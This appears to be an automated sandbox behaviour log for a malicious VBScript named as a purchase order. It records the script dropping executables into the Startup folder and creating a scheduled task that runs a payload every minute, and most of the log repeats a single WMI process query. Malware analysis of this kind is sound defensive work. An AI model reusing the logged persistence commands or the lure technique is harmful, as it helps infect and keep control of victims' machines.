                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Purchase Order Summary Details.vbsVirustotal: Detection: 46%
                                Source: Purchase Order Summary Details.vbsReversingLabs: Detection: 31%
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
